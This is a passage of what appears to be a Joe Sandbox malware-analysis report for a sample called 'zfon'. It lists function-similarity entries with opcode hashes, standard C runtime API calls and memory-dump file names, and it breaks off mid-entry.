                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: fa3fac953ba7f5670c52880217c483c6a0cee3ff45f13c0d2ce097923e961f99
                                                                                                                                                                            • Instruction ID: 6ed997f2d5f58ffbd5e384f0fc898099c86fac96a3d67db9d46669cdbc45c9d4
                                                                                                                                                                            • Opcode Fuzzy Hash: fa3fac953ba7f5670c52880217c483c6a0cee3ff45f13c0d2ce097923e961f99
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F315272718E8682EF64EF25E8513A9E3B1FB84B88F845031DA8E47664DF3CD544C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: 8268dcab7a56983feab380dfe6f9109ee8267f72ccab6befec655a4e3f35a947
                                                                                                                                                                            • Instruction ID: c64451c7039aaf054641f861efedd01069e5824484f91d85c09af1ee36fcd592
                                                                                                                                                                            • Opcode Fuzzy Hash: 8268dcab7a56983feab380dfe6f9109ee8267f72ccab6befec655a4e3f35a947
                                                                                                                                                                            • Instruction Fuzzy Hash: 76312F72618A8682EF64EF29E8503ADE371FB94B88F885031DA8E47669DF3CD544C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xtime_diff_to_millis2xtime_get$Mtx_reset_owner
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 638720424-0
                                                                                                                                                                            • Opcode ID: d059957066d422e0388afbfcbb9ff7b92e138296fa2b63c007ccbc5cfd8a943f
                                                                                                                                                                            • Instruction ID: b30dfa4828c24fc93d36cb7e2bfa18c09b36e1aeb57922ccdc568411fb14906d
                                                                                                                                                                            • Opcode Fuzzy Hash: d059957066d422e0388afbfcbb9ff7b92e138296fa2b63c007ccbc5cfd8a943f
                                                                                                                                                                            • Instruction Fuzzy Hash: 05218EA6708A4146EB25EF37E8511BB5390BF88FC4F84A031EE4E67B56DE3CD4068B00
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD9169
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD917E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD918E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD919E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD91AB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: c61b8eca7707c6acc97522e83f7ba76b893d7a39df7e64e0ba538e7a668f895c
                                                                                                                                                                            • Instruction ID: 12f4fa47bf0b6b9a9f18bc2307ac0d14a2e724dc8efa877ea4a52e9b756fbfc8
                                                                                                                                                                            • Opcode Fuzzy Hash: c61b8eca7707c6acc97522e83f7ba76b893d7a39df7e64e0ba538e7a668f895c
                                                                                                                                                                            • Instruction Fuzzy Hash: 69212E76A09B0A81DF24AFB9E49822C7376EB48FA5F814535CA5D033A8DF3CD485C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3063020102-0
                                                                                                                                                                            • Opcode ID: b7d7a0f5dd6735219fee2986d46814913f8ea3ccb4877a25bd0d6eac9163ac4b
                                                                                                                                                                            • Instruction ID: 8ffa36f6f0e54c2f9f1a2fbe7789cd3e9b9905e6c7539e202fa1ae6d19e08c60
                                                                                                                                                                            • Opcode Fuzzy Hash: b7d7a0f5dd6735219fee2986d46814913f8ea3ccb4877a25bd0d6eac9163ac4b
                                                                                                                                                                            • Instruction Fuzzy Hash: 13211A23B08A4791FF28AF39E448379A362EB41B94F940435DA4D1769ACF7CE4D183A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF79CFCE241
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE26A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE27A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE28A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE297
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$strtoul
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1658144056-0
                                                                                                                                                                            • Opcode ID: 94d14b2b1c7cf6c2facd01616af17b4eae40a61955ec83c18419d7b9d0e7b284
                                                                                                                                                                            • Instruction ID: 41be54b18db324d4633b74dba903e528f5431aa7c6a1831584795e4da9527d58
                                                                                                                                                                            • Opcode Fuzzy Hash: 94d14b2b1c7cf6c2facd01616af17b4eae40a61955ec83c18419d7b9d0e7b284
                                                                                                                                                                            • Instruction Fuzzy Hash: 07119066F5C50742FE38B779E44C279A363EF897D0FC00831D68E03695EE2CE4844521
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$setlocale
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 294139027-0
                                                                                                                                                                            • Opcode ID: 33854c43b5f3c28a57ffc5b189671f457a919127f309d7183e95e5e4e4349629
                                                                                                                                                                            • Instruction ID: 57b27886c3d769f298811711e71ebdf625bce59d4472237127607906b5206c6c
                                                                                                                                                                            • Opcode Fuzzy Hash: 33854c43b5f3c28a57ffc5b189671f457a919127f309d7183e95e5e4e4349629
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B110AAAA16B0185FF14DFB0C4B433A2360EF59F39F142674C91E251D9CF2C9495CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CB5
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CCE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CDE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CEE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CFB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: efd3d99e0a51efc82058e2233da9612c38963ae01040c96e8f0411da84b97f61
                                                                                                                                                                            • Instruction ID: 7c04867a079919de237fecd3805dec0effa70ab993ba44e3f92d7c51f63bc5d2
                                                                                                                                                                            • Opcode Fuzzy Hash: efd3d99e0a51efc82058e2233da9612c38963ae01040c96e8f0411da84b97f61
                                                                                                                                                                            • Instruction Fuzzy Hash: F0F06265E8E44762F92CF7B9A45C378A166AF80771FC00E39C66F129D49E5C20C40132
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE03
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE1F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE2F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE3F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE4C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 5821015ce4819945f0a8bc57dc87e425e76cdc1b5b383618c374124c9746fd65
                                                                                                                                                                            • Instruction ID: fa73c25ae5efbc5f7e0748781df4abe51fbf8c41b9fbaa40c80b1a1c93b6b6d9
                                                                                                                                                                            • Opcode Fuzzy Hash: 5821015ce4819945f0a8bc57dc87e425e76cdc1b5b383618c374124c9746fd65
                                                                                                                                                                            • Instruction Fuzzy Hash: BBF04FA5E0C10BA5FD68B776B44C2B8A163AF94BA1FC00835C14D92E58EE5C20888233
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0B3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0CF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0DF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0EF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFFC0FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: f6d4627fd98ba14bac13975c10f1fb685cbe1d88eedefbfb9420bcdc66ef4efb
                                                                                                                                                                            • Instruction ID: 19f9056f12d296551fff80c46c6863f8751e8c37f8da43754a0e4eb99494e64c
                                                                                                                                                                            • Opcode Fuzzy Hash: f6d4627fd98ba14bac13975c10f1fb685cbe1d88eedefbfb9420bcdc66ef4efb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF096B5E4D11765ED38B775E44D238A1EBEF407A1FC00835C14E12B58EE5C64D98236
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC9973
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC998F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC999F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC99AF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F93), ref: 00007FF79CFC99BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 0a558ddb4e7029915ba6baf9eb4b52181b74cb87701a1e4e30068ed0fff62220
                                                                                                                                                                            • Instruction ID: 23cc8e96a80ecc33593f3f8a747f0aabf38d9e07fb670ac900d87422a2beaf1d
                                                                                                                                                                            • Opcode Fuzzy Hash: 0a558ddb4e7029915ba6baf9eb4b52181b74cb87701a1e4e30068ed0fff62220
                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF03CA5F8D50765EE68B777B84C328A163AF417A1FC00835C14E92A58EE5C21888233
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC98F3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC990F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC991F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC992F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFC8F13), ref: 00007FF79CFC993C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 2fb25108f35d941593c22e25bba104b268c97b58bb64699d526f95c43bc25dae
                                                                                                                                                                            • Instruction ID: 8989aaca298c503b3fd1b035d20baa333c9f9cbfe70c43600fd60b07d6d8c685
